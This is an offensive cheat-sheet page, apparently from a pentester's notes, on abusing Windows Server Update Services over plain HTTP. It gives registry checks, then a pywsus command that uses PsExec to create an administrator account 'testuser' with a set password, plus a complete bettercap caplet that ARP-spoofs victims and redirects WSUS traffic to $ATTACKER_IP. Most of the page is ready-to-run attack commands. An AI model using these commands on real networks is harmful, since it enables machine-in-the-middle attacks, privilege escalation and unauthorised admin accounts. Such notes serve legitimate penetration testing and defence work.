WSUS

Windows Server Update Services

https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#wsus

HTTP MitM

Check:

PS > reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate /v WUServer

HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate /v WUServer
      WUServer    REG_SZ    http://wsus.megacorp.local:8530

PS > reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU /v UseWUServer

HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU /v UseWUServer
      UseWUServer    REG_DWORD    0x1

Exploit:

$ python3 pywsus.py --host $ATTACKER_IP --port 8530 --executable /home/snovvcrash/www/PsExec64.exe --command '/accepteula /s cmd.exe /c "net user testuser Passw0rd! /add && net localgroup Administrators testuser /add"'
$ sudo ./bettercap --iface $INTERFACE --caplet wsus.cap

wsus.cap

# Quick recon of the network
net.probe on

# Set the ARP spoofing
set arp.spoof.targets $CLIENT_IP
set arp.spoof.internal false
set arp.spoof.fullduplex false

# Re-route traffic aimed at the WSUS server
set any.proxy.iface $INTERFACE
set any.proxy.protocol TCP
set any.proxy.src_address $WSUS_SERVER_IP
set any.proxy.src_port 8530
set any.proxy.dst_address $ATTACKER_IP
set any.proxy.dst_port 8530

# Control logging and verbosity
events.ignore endpoint
events.ignore net.sniff

# Start the modules
any.proxy on
arp.spoof on
net.sniff on

Local Proxy (LPE)

https://www.gosecure.net/blog/2020/09/08/wsus-attacks-part-2-cve-2020-1013-a-windows-10-local-privilege-escalation-1-day/

WSUS + LDAPS NTLM Relay

https://www.gosecure.net/blog/2021/11/22/gosecure-investigates-abusing-windows-server-update-services-wsus-to-enable-ntlm-relaying-attacks/

Tools

SharpWSUS

Last updated 2 years ago